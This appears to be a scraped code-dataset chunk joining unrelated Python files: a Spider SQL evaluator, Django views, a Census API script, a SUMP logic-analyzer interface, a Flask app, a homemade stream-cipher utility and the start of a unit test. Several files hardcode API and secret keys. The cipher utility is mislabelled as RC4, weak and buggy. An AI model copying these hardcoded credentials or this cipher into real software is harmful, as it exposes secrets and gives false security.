str(example.schema._table['exp_primary_keys']))
f_out.close()
questions.append(" ".join(example.src_sent))
pred_sql.append(_pred_spider_sql)
gold_sql.append(_gold_spider_sql)
pred_actions.append(pred_spider_sql.actions)
gold_actions.append([a.action for a in example.tgt_actions])
partial_scores = evaluator.partial_scores
scores[hardness]['exact'] += exact_score
scores['all']['exact'] += exact_score
for type_ in partial_types:
if partial_scores[type_]['pred_total'] > 0:
scores[hardness]['partial'][type_]['acc'] += partial_scores[type_]['acc']
scores[hardness]['partial'][type_]['acc_count'] += 1
if partial_scores[type_]['label_total'] > 0:
scores[hardness]['partial'][type_]['rec'] += partial_scores[type_]['rec']
scores[hardness]['partial'][type_]['rec_count'] += 1
scores[hardness]['partial'][type_]['f1'] += partial_scores[type_]['f1']
if partial_scores[type_]['pred_total'] > 0:
scores['all']['partial'][type_]['acc'] += partial_scores[type_]['acc']
scores['all']['partial'][type_]['acc_count'] += 1
if partial_scores[type_]['label_total'] > 0:
scores['all']['partial'][type_]['rec'] += partial_scores[type_]['rec']
scores['all']['partial'][type_]['rec_count'] += 1
scores['all']['partial'][type_]['f1'] += partial_scores[type_]['f1']
idx += 1
for level in levels:
if scores[level]['count'] == 0:
continue
if etype in ["all", "match"]:
scores[level]['exact'] /= scores[level]['count']
for type_ in partial_types:
if scores[level]['partial'][type_]['acc_count'] == 0:
scores[level]['partial'][type_]['acc'] = 0
else:
scores[level]['partial'][type_]['acc'] = scores[level]['partial'][type_]['acc'] /\
scores[level]['partial'][type_]['acc_count'] * 1.0
if scores[level]['partial'][type_]['rec_count'] == 0:
scores[level]['partial'][type_]['rec'] = 0
else:
scores[level]['partial'][type_]['rec'] = scores[level]['partial'][type_]['rec'] /\
scores[level]['partial'][type_]['rec_count'] * 1.0
if scores[level]['partial'][type_]['acc'] == 0 and scores[level]['partial'][type_]['rec'] == 0:
scores[level]['partial'][type_]['f1'] = 1
else:
scores[level]['partial'][type_]['f1'] = \
2.0 * scores[level]['partial'][type_]['acc'] * scores[level]['partial'][type_]['rec'] /\
(scores[level]['partial'][type_]['rec'] + scores[level]['partial'][type_]['acc'])
scores["accuracy"] = scores["all"]["exact"]
out_dict = {
"questions": questions,
"pred_sql": pred_sql,
"gold_sql": gold_sql,
"pred_actions": pred_actions,
"gold_actions": gold_actions,
}
print("eval_err_num:{}".format(eval_err_num))
if save_failed_samples:
with open(os.path.join(out_path, "failed_samples.pkl"), "wb") as out:
pickle.dump(out_dict, out)
else:
scores = {'accuracy': 0.0}
for example, spider_sql in zip(examples, decode_results):
pruned_hyps = []
for hyp in spider_sql:
if is_sql_valid(hyp.code, example.schema):
pruned_hyps.append(hyp)
gold_spider_sql = example.sql
schema = example.schema
kmap = build_foreign_key_map(example.schema._table)
g_valid_col_units = build_valid_col_units(
gold_spider_sql['from']['table_units'], schema)
gold_spider_sql = rebuild_sql_val(gold_spider_sql)
gold_spider_sql = rebuild_sql_col(g_valid_col_units, gold_spider_sql, kmap)
flag = False
for hyp in pruned_hyps:
p_valid_col_units = build_valid_col_units(
hyp.code['from']['table_units'], schema)
hyp.code = rebuild_sql_val(hyp.code)
hyp.code = rebuild_sql_col(p_valid_col_units, hyp.code, kmap)
exact_score = evaluator.eval_exact_match(hyp.code, gold_spider_sql)
if exact_score:
flag = True
break
scores['accuracy'] += 1.0 if flag else 0.0
scores['accuracy'] /= len(examples)
return scores
@registry.register('evaluator', 'spider-action-evaluator')
def create_spider_action_prediction_evaluator(transition_system, eval_top_pred_only=True, for_inference=False):
def evaluate_action_predictions(examples, predictions, exp_dir_path):
"""
@param examples_batches: list(list(example))
@param predictions_batches: list(list(tensor))
@param exp_dir_path: str
@return:
"""
eva_output_path = None
if (exp_dir_path is not None) and (not for_inference):
eva_output_path = os.path.join(exp_dir_path, 'eval_output')
if not os.path.exists(eva_output_path):
os.makedirs(eva_output_path)
logger = logging.getLogger()
code_results = list()
for data_idx, pred in enumerate(predictions):
decoded_hyps = list()
for hyp_id, hyp in enumerate(pred):
try:
hyp.code = transition_system.ast_to_surface_code(
hyp.tree, examples[data_idx].schema
)
decoded_hyps.append(hyp)
except Exception:
logger.error('Exception in converting tree to code:')
logger.error(traceback.format_stack())
logger.error(traceback.format_exc())
logger.error('-' * 60)
logger.error('Example: %s\nIntent: %s\nTarget Code:\n%s\nHypothesis[%d]:\n%s' % (
data_idx, ' '.join(examples[data_idx].src_sent),
examples[data_idx].tgt_code, hyp_id, hyp.tree.to_string()
))
logger.error('-' * 60)
code_results.append(decoded_hyps)
if for_inference:
eval_result = []
for example, spider_sql in zip(examples, code_results):
pruned_hyps = []
for hyp in spider_sql:
if is_sql_valid(hyp.code, example.schema):
pruned_hyps.append(hyp)
pred_spider_sql = pruned_hyps[:1]
if not pred_spider_sql:
# dummy sql
surface_sql = 'SELECT *'
else:
pred_spider_sql = pred_spider_sql[0].code
surface_sql = SpiderAST(pred_spider_sql, example.schema._table).get_sql()
eval_result.append(surface_sql)
with open('predicted_sql.txt', 'w') as f:
for q in eval_result:
f.write(q + '\n')
else:
evaluator = SpiderSqlEvaluator(None, None)
eval_results = evaluator.evaluate_dataset(
examples, code_results, eva_output_path, fast_mode=eval_top_pred_only,
test_mode='dev', save_failed_samples=eva_output_path is not None)
print_scores(eval_results, 'match', p_func=logger.info)
eval_result = eval_results['accuracy']
return eval_result
return evaluate_action_predictions
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--gold', dest='gold', type=str)
parser.add_argument('--pred', dest='pred', type=str)
parser.add_argument('--db', dest='db', type=str)
parser.add_argument('--table', dest='table', type=str)
parser.add_argument('--etype', dest='etype', type=str)
args = parser.parse_args()
gold = args.gold
pred = args.pred
db_dir = args.db
table = args.table
etype = args.etype
assert etype in ["all", "exec", "match"], "Unknown evaluation method"
kmaps = build_foreign_key_map_from_json(table)
evaluate(gold, pred, db_dir, etype, kmaps)
| BorealisAI/DT-Fixup | spider/semparser/modules/semantic_parser/evaluator/spider_evaluator.py | spider_evaluator.py | py | 47,165 | python | en | code | 15 | github-code | 36 | [
{
"api_name": "sqlite3.connect",
"line_number": 461,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 538,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 538,
"usage_type": "attribute"
},
{
"api_name": "semparser.modules.semant... |
27102778456 | from django.shortcuts import render
import json
from django.core import serializers
from django.http import (
HttpResponse,
HttpResponseRedirect,
JsonResponse,
)
from django.template import loader
from django.core.urlresolvers import reverse_lazy
from django.contrib.auth.decorators import login_required
from django.views.generic import (
ListView,
View
)
from django.views.generic.detail import DetailView
from django.views.generic.edit import (
CreateView,
UpdateView,
DeleteView
)
from django.http import JsonResponse
from django.views.generic import TemplateView
from django.contrib.messages.views import SuccessMessageMixin
from .models import MateriaPrima
from proveedores.mixins import JSONResponseMixin
from .forms import MateriaPrimaForm
from loginusers.mixins import LoginRequiredMixin
class ListarMateriaPrima(LoginRequiredMixin, JSONResponseMixin, ListView):
model = MateriaPrima
template_name = 'materiaprima_list.html'
paginate_by = 5
def get(self, request, *args, **kwargs):
self.object_list = self.get_queryset()
return self.render_to_json_response()
def get_data(self):
data = [{
'id': materiaprima.id,
'value': materiaprima.nombre,
} for materiaprima in self.object_list]
return data
def get_queryset(self):
nom = self.request.GET.get('term', None)
if nom:
queryset = self.model.objects.filter(nombre__icontains=nom)
else:
queryset = super(ListarMateriaPrima, self).get_queryset()
return queryset
class CrearMateriaPrima(LoginRequiredMixin, SuccessMessageMixin, CreateView):
model = MateriaPrima
success_url = reverse_lazy('materiaprim:materiaPrimaForm')
form_class = MateriaPrimaForm
success_message = 'La materia prima %(nombre)s se registro en el sistema'
class ModificarMateriaPrima(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = MateriaPrima
slug_field = 'id'
slug_url_kwarg = 'id'
form_class = MateriaPrimaForm
success_url = reverse_lazy('materiaprim:materiaPrimaForm')
success_message = 'Los datos de la materia prima %(nombre)s se actualizaron'
class ActualizarEstadoView(JSONResponseMixin, View):
object = None
relacion = None
def post(self, request):
id = self.request.POST.get('id', None)
materia = None
try:
materia = MateriaPrima.objects.get(id=id)
except MateriaPrima.DoesNotExist as e:
self.object = materia
if materia is not None:
materia.estado = False
materia.save()
self.object = materia
return self.render_to_json_response()
def get_data(self):
if self.object is not None:
data = {
'message': 'Se inhabilito la materia rima',
}
else:
data = {
'message': 'Esta materia prima se encuentra asociada'
}
return data
class ConsultarMateriaPrima(LoginRequiredMixin, JSONResponseMixin, DetailView):
model = MateriaPrima
slug_field = 'id'
slug_url_kwarg = 'id'
def get(self, request, *args, **kwargs):
self.object = self.get_object()
return self.render_to_json_response()
def get_data(self):
if self.object is not None:
data = {
'status': 200,
'materia':{
'id': self.object.id,
'nombre': self.object.nombre,
'descripcion': self.object.descripcion,
'unidad_medida': self.object.unidad_medida.nombre,
'categoria': self.object.categoria.nombre,
'cantidad': self.object.cantidad,
'estado': self.object.estado
}
}
else:
data = {
'status': 404,
'message': 'La materia prima no se encuentra registrada'
}
return data
def get_object(self, queryset=None):
if queryset is None:
queryset = self.get_queryset()
pk = self.kwargs.get(self.pk_url_kwarg)
slug = self.kwargs.get(self.slug_url_kwarg)
if pk is not None:
queryset = queryset.filter(pk=pk)
if slug is not None and (pk is None or self.query_pk_and_slug):
slug_field = self.get_slug_field()
queryset = queryset.filter(**{slug_field: slug})
if pk is None and slug is None:
raise AttributeError("Generic detail view %s must be called with "
"either an object pk or a slug."
% self.__class__.__name__)
try:
obj = queryset.get()
except queryset.model.DoesNotExist:
obj = None
return obj
class MateriaPrimaView(LoginRequiredMixin, TemplateView):
template_name = 'materiaprima/materiaprima_form.html'
def get_context_data(self, **kwargs):
context = super(MateriaPrimaView, self).get_context_data(**kwargs)
context.update({'form': MateriaPrimaForm()})
return context
| IvanVilla1585/RefrescosChupiFlum | ChupiFlum/materiaprima/views.py | views.py | py | 5,202 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "loginusers.mixins.LoginRequiredMixin",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "proveedores.mixins.JSONResponseMixin",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "django.views.generic.ListView",
"line_number": 32,
"usage_type"... |
40117095233 | """
pop_by_tract.py (Script 1/3)
Date updated: 5/11/2023
Imports DC population data by census tract from Census API.
"""
"""
Requires:
- Census API key, which can be acquired here: https://api.census.gov/data/key_signup.html
Output:
- "pop_by_tract_2020.csv"
"""
#%%
## Set working directory to script directory "2020_Analysis"
## Note: Be sure that the required input files are located in the "2020_Analysis"
## folder as well.
import os
os.chdir(os.path.dirname(__file__))
#%%
# Import modules
import requests
import pandas as pd
import numpy as np
#%%
## API call
# Variable dictionary
variables = {'B02001_001E':'pop_total', 'B02001_002E':'pop_white',
'B25003_001E':'housing_total', 'B25003_002E':'housing_owned',
'B25003_003E':'housing_rental'}
# Variable list
var_list = variables.keys()
# Variable string (comma-separated)
var_string = ",".join(var_list)
# URL
api = 'https://api.census.gov/data/2020/acs/acs5'
# Set geographic unit
for_clause = 'tract:*'
# Select NY
in_clause = 'state:11 county:001'
key_value = 'f382fd0108eba2b32808ba82bcccc82861d0b53a'
# API call
payload = {'get':var_string, 'for':for_clause, 'in':in_clause, 'key':key_value}
response = requests.get(api, payload)
if response.status_code == 200:
print('\nAPI Request: Success\n')
else:
print(f'\nRequest status code: {response.status_code}\n{response.text}\n')
assert False
#%%
## Convert JSON to Dataframe
# List of rows
row_list = response.json()
# Set column names
colnames = row_list[0]
# Set data rows
datarows = row_list[1:]
# Pandas dataframe
pop = pd.DataFrame(columns=colnames, data=datarows)
#%%
## Prepare data
# Replace missing data with NaN
pop = pop.replace(-666666666, np.nan)
# Rename columns
pop = pop.rename(columns=variables)
# GEOID column
pop['GEOID'] = pop['state'] + pop['county'] + pop['tract']
# Set index to GEOID
pop = pop.set_index('GEOID')
# Drop columns
keep_cols = variables.values()
pop = pop[keep_cols]
#%%
## Write population by census tract to CSV
pop.to_csv('pop_by_tract_2020.csv')
print("\nDownloaded 'pop_by_tract_2020.csv'")
| tbond99/dc-historic-districts-and-gentrification | 1__2020_Analysis/1_pop_by_tract.py | 1_pop_by_tract.py | py | 2,153 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.chdir",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number... |
29965495383 | #!/usr/bin/env python
# import sys
import logging
import struct
import serial
from . import errors
from . import fio
from . import ops
# import settings this as settings_module to avoid name conflicts
from . import settings as settings_module
logger = logging.getLogger(__name__)
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.DEBUG)
class Interface(object):
# undivided clock rate, in Hz, from testing with OBLS
protocol_version = '1.0'
def __init__(
self, path='/dev/ttyACM0', baud=115200,
timeout=None, settings=None, **kwargs):
self.timeout = timeout
if settings is None:
self.settings = settings_module.Settings(**kwargs)
else:
self.settings = settings
if len(kwargs):
for kw in kwargs:
setattr(self.settings, kw, kwargs[kw])
self.port = serial.Serial(path, baud, timeout=self.timeout)
self.debug_logger = None
self.reset()
self.metadata = self.query_metadata()
self.send_settings()
def reset(self):
logger.debug("reset")
self.port.write('\x00\x00\x00\x00\x00')
def capture(self, send_settings=True):
'''Request a capture.'''
logger.debug("capture")
if send_settings:
self.send_settings()
# get local references to objects for faster execution ..
logger.debug("building unpack functions")
ufs = []
for i in xrange(4):
if not (self.settings.channel_groups & (0b1 << i)):
ufs.append(lambda c, si=i: ord(c) << (8 * si))
d = []
self.port.timeout = self.settings.timeout
logger.debug("starting capture")
self.port.write('\x01') # start the capture
logger.debug("reading capture")
for i in xrange(self.settings.read_count):
v = 0
for uf in ufs:
v |= uf(self.port.read(1))
d.append(v)
self.reset() # TODO is this needed?
if self.settings.latest_first:
return d[::-1]
else:
return d
def save(self, capture, filename, meta=None):
logger.debug("save %s", filename)
fio.save(capture, filename, self.settings, meta)
def id_string(self):
'''Return device's SUMP ID string.'''
logger.debug("id_string")
self.port.write('\x02')
# TODO check protocol version here
val = self.port.read(4) # 4 bytes as a small-endian int
return val[::-1]
def xon(self):
logger.debug("xon")
self.port.write('\x11')
def xoff(self):
logger.debug("xoff")
self.port.write('\x13')
def _send_trigger_mask(self, stage, mask):
logger.debug("send_trigger_mask %s %s", stage, mask)
#w = self.port.write
#w = self._trace_control('Trigger mask')
msg = struct.pack('<Bi', 0xC0 | (stage << 2), mask)
self.port.write(msg)
#w(chr(0xC0 | (stage << 2)))
#w(chr(mask & 0xFF))
#w(chr((mask >> 8) & 0xFF))
#w(chr((mask >> 16) & 0xFF))
#w(chr((mask >> 24) & 0xFF))
def _send_trigger_value(self, stage, value):
logger.debug("send_trigger_value %s %s", stage, value)
#w = self.port.write
#w = self._trace_control('Trigger values')
msg = struct.pack('<Bi', 0xC1 | (stage << 2), value)
self.port.write(msg)
#w(chr(0xC1 | (stage << 2)))
#w(chr(values & 0xFF))
#w(chr((values >> 8) & 0xFF))
#w(chr((values >> 16) & 0xFF))
#w(chr((values >> 24) & 0xFF))
def _send_trigger_configuration(
self, stage, delay, channel, level, start, serial):
logger.debug(
"send_trigger_configuration %s %s %s %s %s %s",
stage, delay, channel, level, start, serial)
msg = struct.pack(
'<BHBB',
0xC2 | (stage << 2),
delay,
((channel & 0x0F) << 4) | level,
(start << 3) | (serial << 2) | ((channel & 0x10) >> 4))
self.port.write(msg)
#w = self.port.write
#w = self._trace_control('Trigger config')
#w(chr(0xC2 | (stage << 2)))
#d = delay
#w(chr(d & 0xFF))
#w(chr((d >> 8) & 0xFF))
#c = channel
#w(chr(((c & 0x0F) << 4) | level))
#w(chr((start << 3) | (serial << 2) | ((c & 0x10) >> 4)))
def send_divider_settings(self, settings):
logger.debug("send_divider_settings %s", settings.divider)
d = settings.divider - 1 # offset 1 correction for SUMP hardware
msg = struct.pack('<cHBx', '\x80', d & 0xFFFF, d >> 16)
self.port.write(msg)
#w = self.port.write
##w = self._trace_control('Divider')
#w('\x80')
#d = settings.divider - 1 # offset 1 correction for SUMP hardware
#w(chr(d & 0xFF))
#w(chr((d >> 8) & 0xFF))
#w(chr((d >> 16) & 0xFF))
#w('\x00')
def send_read_and_delay_count_settings(self, settings):
logger.debug("send_read_and_delay_count_settings")
#r = (settings.read_count + 3) >> 2
r = (settings.read_count // 4)
settings.read_count = r * 4
#d = (settings.delay_count + 3) >> 2
d = (settings.delay_count // 4)
settings.delay_count = d * 4
msg = struct.pack('<cHH', '\x81', r, d)
self.port.write(msg)
#w = self.port.write
##w = self._trace_control('Read/Delay')
#w('\x81')
## factor 4 correction for SUMP hardware
#r = (settings.read_count + 3) >> 2
#w(chr(r & 0xFF))
#w(chr((r >> 8) & 0xFF))
## factor 4 correction for SUMP hardware
#d = (settings.delay_count + 3) >> 2
#w(chr(d & 0xFF))
#w(chr((d >> 8) & 0xFF))
def send_flags_settings(self, settings):
logger.debug("send_flag_settings")
msg = struct.pack(
'<cBxxx', '\x82',
(settings.inverted << 7) | (settings.external << 6) |
(settings.channel_groups << 2) | (settings.filter << 1) |
settings.demux)
self.port.write(msg)
#w = self.port.write
##w = self._trace_control('Flags')
#w('\x82')
#w(chr((settings.inverted << 7)
# | (settings.external << 6)
# | (settings.channel_groups << 2)
# | (settings.filter << 1)
# | settings.demux
# ))
## disable RLE compression, alternate number scheme, test modes
#w('\x00')
#w('\x00')
#w('\x00')
def send_settings(self):
"""
The order of things in this function are CRITICAL
"""
logger.debug("send_settings")
self.send_divider_settings(self.settings)
trigger_enable = self.settings.trigger_enable
if trigger_enable == 'None':
# send always-trigger trigger settings
for stage in xrange(self.settings.trigger_max_stages):
self._send_trigger_configuration(stage, 0, 0, 0, True, False)
self._send_trigger_mask(stage, 0)
self._send_trigger_value(stage, 0)
elif trigger_enable == 'Simple':
# set settings from stage 0, no-op for stages 1..3
self._send_trigger_configuration(
0, self.settings.trigger_stages[0].delay,
self.settings.trigger_stages[0].channel,
0, True, self.settings.trigger_stages[0].serial)
self._send_trigger_mask(0, self.settings.trigger_stages[0].mask)
self._send_trigger_value(0, self.settings.trigger_stages[0].value)
for stage in xrange(1, self.self.settings.trigger_max_stages):
self._send_trigger_configuration(stage, 0, 0, 0, False, False)
self._send_trigger_mask(stage, 0)
self._send_trigger_value(stage, 0)
elif trigger_enable == 'Complex':
for (i, stage) in enumerate(self.settings.trigger_stages):
# OLS needs things in this order
self._send_trigger_mask(i, stage.mask)
self._send_trigger_value(i, stage.value)
self._send_trigger_configuration(
i, stage.delay, stage.channel, stage.level, stage.start,
stage.serial)
else:
raise errors.TriggerEnableError
self.send_read_and_delay_count_settings(self.settings)
self.send_flags_settings(self.settings)
def query_metadata(self):
'''Return metadata identifying the SUMP device,
firmware, version, etc.'''
logger.debug("query_metadata")
result = []
self.reset()
r = self.port.read
timeout = self.port.timeout # save timeout setting to restore later
try:
# only wait 2 seconds for devices that don't do metadata
self.port.timeout = 2
self.port.write('\x04')
while True:
token = r(1)
if not token: # end-of-file
break
token = ord(token)
if not token: # binary 0 end-of-metadata marker
break
elif token <= 0x1F: # C-string follows token
v = []
while True:
x = r(1)
if x != '\0':
v .append(x)
else:
break
result.append((token, ''.join(v)))
elif token <= 0x3F: # 32-bit int follows token
result.append((token, ops.big_endian(r(4))))
elif token <= 0x5F: # 8-bit int follows token
result.append((token, ord(r(1))))
else:
result.append((token, None))
finally:
self.port.timeout = timeout # restore timeout setting
return result
def close(self):
logger.debug("close")
self.port.close()
self.port = None
def open_interface(port='/dev/ttyACM0', baud=115200, **kwargs):
i = Interface(port, baud, **kwargs)
return i
| braingram/pysump | sump/interface.py | interface.py | py | 10,286 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "logging.StreamHandler",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "serial.Ser... |
35612628358 | from flask import Flask, render_template, request
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import DataRequired
from datetime import datetime
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_security import Security, SQLAlchemyUserDatastore, UserMixin, RoleMixin, login_required
from flask_admin import Admin
from flask_admin.contrib.sqla import ModelView
from flask_googlemaps import GoogleMaps, Map
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SECRET_KEY'] = '임희연'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
app.config['SECURITY_PASSWORD_SALT'] = '임희연'
app.config['GOOGLEMAPS_KEY'] = "AIzaSyCqXCWpsYcokf52FhcNNWfZ8Ib5ScUJv9U"
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
moment = Moment(app)
db = SQLAlchemy(app)
map = GoogleMaps(app)
admin = Admin(app, name='HeeYeon')
roles_users = db.Table('roles_users', db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id')))
class SearchForm(FlaskForm):
search = StringField('검색', validators=[DataRequired()])
class MyForm(FlaskForm):
text = StringField('text', validators=[DataRequired()])
class Role(db.Model, RoleMixin):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(255), unique=True)
password = db.Column(db.String(255))
active = db.Column(db.Boolean())
confirmed_at = db.Column(db.DateTime())
roles = db.relationship('Role', secondary=roles_users, backref=db.backref('users', lazy='dynamic'))
user_datastore = SQLAlchemyUserDatastore(db, User, Role)
security = Security(app, user_datastore)
admin.add_view(ModelView(User, db.session))
def create_user():
db.create_all()
user_datastore.create_user(email='heeyeon@gmail.net', password='password')
db.session.commit()
# Views
@app.route('/login')
@login_required
def home():
return render_template('index.html')
@app.route('/')
def index():
dt = datetime.utcnow()
return render_template('index.html', dt=dt)
@app.route('/graph')
def graph():
from data import plotdata
script, div = plotdata()
return render_template('graph.html', script=script, div=div)
@app.route('/0703', methods=['GET', 'POST'])
def hello_0703():
dt = datetime(2018, 7, 3)
return render_template('0703.html', dt=dt)
@app.route('/0705', methods=['GET', 'POST'])
def hello_0705():
dt = datetime(2018, 7, 5)
return render_template('0705.html', dt=dt)
@app.route('/0709', methods=['GET', 'POST'])
def hello_0709():
dt = datetime(2018, 7, 9)
return render_template('0709.html', dt=dt)
@app.route('/0717', methods=['GET', 'POST'])
def hello_0717():
dt = datetime(2018, 7, 17)
return render_template('0717.html', dt=dt)
@app.route('/0718', methods=['GET', 'POST'])
def hello_0718():
dt = datetime(2018, 7, 18)
return render_template('0718.html', dt=dt)
@app.route('/search', methods=['GET', 'POST'])
def search():
form = MyForm()
if request.method == 'GET': # GET 으로 하면 비밀번호가 다 보인다 그러므로 POST 로 해야한다.
if form.validate_on_submit():
return render_template('index.html')
# print(a)
# b = request.args['a']
# print(b)
# c = request.args.a
# print(c)
return render_template('search.html', form2=form)
else:
return render_template('search.html', form2=form) # template 에서 사용하는 것 = 파이썬에서 쓰는 이름 (똑같이 쓰는 것을 추천)
@app.route('/form', methods=['GET', 'POST'])
def pandas_index():
name = request.args.get('name')
from pandas_ import pandas_index
data = pandas_index()
data2 = data[[name]]
data2.to_html('/Users/limheeyeon/PycharmProjects/0727/templates/hhhh.html')
return render_template('hhhh.html')
@app.route('/booking')
def booking():
return render_template('booking.html')
@app.route('/map')
def googlemap():
sndmap = Map(
identifier="sun",
lat=37.5665,
lng=126.9780,
zoom=7,
style=(
"height:100%;"
"width:100%;"
"top:64;"
"left:0;"
"position:absolute;"
"z-index:200;"
),
language='ko',
markers=[
{
'icon': 'http://maps.google.com/mapfiles/ms/icons/red-dot.png',
'lat': 37.751855,
'lng': 128.876057,
'infobox': "<h1>강릉</h1>"
},
{
'icon': 'http://maps.google.com/mapfiles/ms/icons/blue-dot.png',
'lat': 35.3744136,
'lng': 127.13759,
'infobox': "<h1>순창</h1>"
}
]
)
return render_template('map.html', sndmap=sndmap)
@app.route('/crime')
def crime_map():
from crime import pandas_index2
marker = pandas_index2()
sndmap = Map(
identifier="sun",
lat=39.72606,
lng=-104.949973,
style=(
"height:100%;"
"width:100%;"
"top:64;"
"left:0;"
"position:absolute;"
"z-index:200;"
),
language='ko',
markers=marker
)
return render_template('map1.html', sndmap=sndmap)
if __name__ == '__main__':
app.run()
| gmldusdkwk/Big-Data | 0727/app.py | app.py | py | 5,629 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "flask_moment.Moment",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "flask_sqlalchemy.SQLAlchemy",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "flask_goo... |
35580246140 | import sys
import datetime
import os
class StreamCipherUtil:
def __init__(self, input_file, output_file, key):
self.key = key
self.output_file = output_file
self.input_file = input_file
self.exec_time = None
self.text_len = 0
self.bit_stream = self._pm_rand()
self.bit_len = 8
self.file_text_len = os.stat(self.input_file).st_size
@staticmethod
def progress_bar(count, total, suffix=''):
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', suffix))
sys.stdout.flush()
def _pm_rand(self):
IA = 16807
IM = 2147483647
a = (2 ** 31 - 1) // 2
prev_value = IA * self.hash_key() % IM
next_value = 0
while True:
next_value = IA * prev_value % IM
prev_value = next_value
if next_value < a + 1:
yield '0'
else:
yield '1'
def gen_custom_prng_bit_seq(self):
bit_seq = ""
for index in range(self.bit_len):
bit_seq += next(self.bit_stream)
return int(bit_seq, 2)
def crypt_stream(self, text_stream):
start = datetime.datetime.now()
for ch in text_stream:
yield chr(ord(ch) ^ self.gen_custom_prng_bit_seq())
stop = datetime.datetime.now()
self.exec_time = stop - start
def hash_key(self):
import hashlib
return int(hashlib.sha256(str(self.key).encode('utf-16')).hexdigest(), 16) % (2 ** 31 - 1)
def read_from_file(self):
text = ""
with open(self.input_file, 'r', newline='') as f:
text = f.read()
f.close()
return text
def write_to_file(self, text):
with open(self.output_file, 'w', newline='') as f:
for index, ch in enumerate(text):
f.write(ch)
self.progress_bar(index, self.file_text_len)
self.text_len += 1
f.close()
if __name__ == '__main__':
print("RC4 Encryption/Decryption utility.\n")
while True:
try:
mode = int(input("Choose mode: \n1. Encryption\n2. Decryption\nEnter mode: "))
input_filename = input("Enter input filename: ")
output_filename = input("Enter output filename: ")
key = input("Enter key [0-9a-zA-Zа-яА-Я]: ")
s = StreamCipherUtil(key=[ord(ch) for ch in key], input_file=input_filename,
output_file=output_filename)
data_stream = s.read_from_file()
new_data_stream = None
if mode is 1:
new_data_stream = s.crypt_stream(data_stream)
elif mode is 2:
new_data_stream = s.crypt_stream(data_stream)
s.write_to_file(new_data_stream)
print("\nTime {0} chars/ms".format((s.exec_time.seconds*10**6+s.exec_time.microseconds)/s.text_len))
except KeyboardInterrupt:
print("\nQuit utility.Bye!\n")
break
except ValueError as e:
print("\nError occured! {0}\n".format(e.args)) | Kamkas/Stream-cipher | lab2.py | lab2.py | py | 3,322 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.stat",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sys.stdout.write",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "sys.stdout",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "sys.stdout.flush",
"line... |
1777450651 | import spacy
# Load the English language model
nlp = spacy.load('en_core_web_sm')
# Load the scraped text from the file
with open('website_text.txt', 'r') as f:
text = f.read()
# Process the text with spaCy
doc = nlp(text)
# Extract the sentences
sentences = [sent.text.strip() for sent in doc.sents]
print(sentences)
| anupshrestha7171/FinalTaskOnMentorFriends | Qn2.py | Qn2.py | py | 341 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "spacy.load",
"line_number": 4,
"usage_type": "call"
}
] |
36840712959 | """Unit tests for the resmokelib.testing.executor module."""
import logging
import threading
import unittest
import mock
from opentelemetry.context.context import Context
from buildscripts.resmokelib import errors
from buildscripts.resmokelib.testing import job
from buildscripts.resmokelib.testing import queue_element
from buildscripts.resmokelib.testing.fixtures import interface as _fixtures
from buildscripts.resmokelib.testing.fixtures.fixturelib import FixtureLib
from buildscripts.resmokelib.utils import queue as _queue
# pylint: disable=protected-access
class TestJob(unittest.TestCase):
TESTS = ["jstests/core/and.js", "jstests/core/or.js"]
@staticmethod
def mock_testcase(test_name):
testcase = mock.Mock()
testcase.test_name = test_name
testcase.REGISTERED_NAME = "js_test"
testcase.logger = logging.getLogger("job_unittest")
return testcase
@staticmethod
def mock_interrupt_flag():
interrupt_flag = mock.Mock()
interrupt_flag.is_set = lambda: False
return interrupt_flag
@staticmethod
def get_suite_options(num_repeat_tests=None, time_repeat_tests_secs=None,
num_repeat_tests_min=None, num_repeat_tests_max=None):
suite_options = mock.Mock()
suite_options.num_repeat_tests = num_repeat_tests
suite_options.time_repeat_tests_secs = time_repeat_tests_secs
suite_options.num_repeat_tests_min = num_repeat_tests_min
suite_options.num_repeat_tests_max = num_repeat_tests_max
return suite_options
@staticmethod
def queue_tests(tests, queue, queue_elem_type, suite_options):
for test in tests:
queue_elem = queue_elem_type(TestJob.mock_testcase(test), {}, suite_options)
queue.put(queue_elem)
@staticmethod
def expected_run_num(time_repeat_tests_secs, test_time_secs):
"""Return the number of times a test is expected to run."""
return time_repeat_tests_secs / test_time_secs
def test__run_num_repeat(self):
